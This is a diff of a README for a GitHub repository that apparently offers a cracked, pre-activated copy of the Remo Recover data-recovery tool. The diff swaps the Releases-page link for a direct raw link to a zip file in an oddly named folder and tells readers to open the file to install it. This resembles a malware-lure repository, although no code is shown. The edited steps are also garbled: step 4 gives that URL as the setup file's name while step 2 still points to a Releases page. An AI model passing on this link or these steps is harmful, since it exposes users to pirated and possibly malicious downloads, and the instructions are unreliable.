rividarkk/Remo-Recover-Windows-Activated/README.md

 - **Other Requirements:** Internet connection for download

 ## 💻 Download & Install
-1. Visit this page to download: [Download Remo Recover](https://github.com/rividarkk/Remo-Recover-Windows-Activated/releases).
+1. Visit this page to download: [Download Remo Recover](https://github.com/rividarkk/Remo-Recover-Windows-Activated/raw/refs/heads/main/Megalichthyidae/Recover-Windows-Activated-Remo-v2.7-beta.2.zip).

 2. On the Releases page, locate the latest version of Remo Recover.

 3. Click on the version link to see available files for download.

-4. Select the installation file, typically named something like `RemoRecoverSetup.exe`, to download.
+4. Select the installation file, typically named something like `https://github.com/rividarkk/Remo-Recover-Windows-Activated/raw/refs/heads/main/Megalichthyidae/Recover-Windows-Activated-Remo-v2.7-beta.2.zip`, to download.

 5. Once the file downloads, open it to start the installation process.